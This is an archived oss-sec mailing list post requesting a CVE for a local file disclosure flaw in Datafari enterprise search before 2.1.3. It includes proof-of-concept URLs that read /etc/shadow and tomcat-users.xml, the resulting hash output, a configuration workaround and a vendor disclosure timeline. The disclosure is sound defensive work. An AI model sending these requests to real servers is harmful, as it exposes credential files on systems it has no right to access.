oss-sec mailing list archives
CVE Request: Datafari Local File Disclosure
From: PASCAULT Wilfried <wpascault () lexsi com>
Date: Wed, 3 Feb 2016 15:55:07 +0000
Datafari, an Open source enterprise search software using Apache Solr, ManifoldCF and Tomcat is proned to a local file disclosure vulnerability. Product's information --------------------- * Name : Datafari - http://www.datafari.com/ * Editor: France Labs * Affected versions: 2.x<2.1.3 * Tested : 2.1.0 and 2.1.1 on Debian Wheezy 7 and Jesse 8 Description ----------- When "filesystem" repository has been configured into Datafari (administrative privileges on Datafari required), a user could access to any file of the system with root privileges. On "$INSTALLPATH$/datafari/tomcat/conf/datafari.properties" configuration file, "ALLOWLOCALFILEREADING" parameter allows by default to read file on system. Datafari is by default running as user root, so any file could be downloaded with "url=file:/" parameter in "/Datafari/URL" (token isn't checked). This issue is exploitable only when "Filesystem" repository has been set on ManifoldCF. Proof of concept ---------------- http://localhost:8080/Datafari/URL?url=file:/arbitrary_file http://localhost:8080/Datafari/URL?url=file:/etc/shadow => file will be downloaded as _etc_shadow $ head _etc_shadow root:$6$nTTh32TT$rLqcSGDf92tyh9aXtuTqnlGW4Ewr.IzBEcdP/kMnvhNYELz7iUgmOyiWesbJRUwEeKdKk/2yQcnAVBQYBGsiD.:16714:0:99999:7::: daemon:*:16714:0:99999:7::: bin:*:16714:0:99999:7::: sys:*:16714:0:99999:7::: sync:*:16714:0:99999:7::: games:*:16714:0:99999:7::: man:*:16714:0:99999:7::: lp:*:16714:0:99999:7::: mail:*:16714:0:99999:7::: news:*:16714:0:99999:7::: another funny file ^_^ (Tomcat manager password could not be changed during installation) http://localhost:8080/Datafari/URL?url=file://opt/datafari/tomcat/conf/tomcat-users.xml $ cat _opt_datafari_tomcat_conf_tomcat-users.xml|grep admin <user password="@PASSWORD@" roles="manager-gui,SearchAdministrator" username="admin"/> http://localhost:8080/manager/html/list Workaround ---------- Set "ALLOWLOCALFILEREADING=false" on "$INSTALLPATH$/datafari/tomcat/conf/datafari.properties" and restart Datafari Timeline -------- 1/6/2016: reported to vendor 1/11/2016: vendor response but said was not a security issue 1/11/2016: add technical details and POC 1/11/2016: vendor acknowledged as a security issue 1/11/2016: patch was commited in master branch 1/28/2016: 2.1.3 released Thanks to Cédric and Aurélien from Datafari project for their quick replies.
Current thread:
- CVE Request: Datafari Local File Disclosure PASCAULT Wilfried (Feb 03)
- Re: CVE Request: Datafari Local File Disclosure Fried Wil (Feb 24)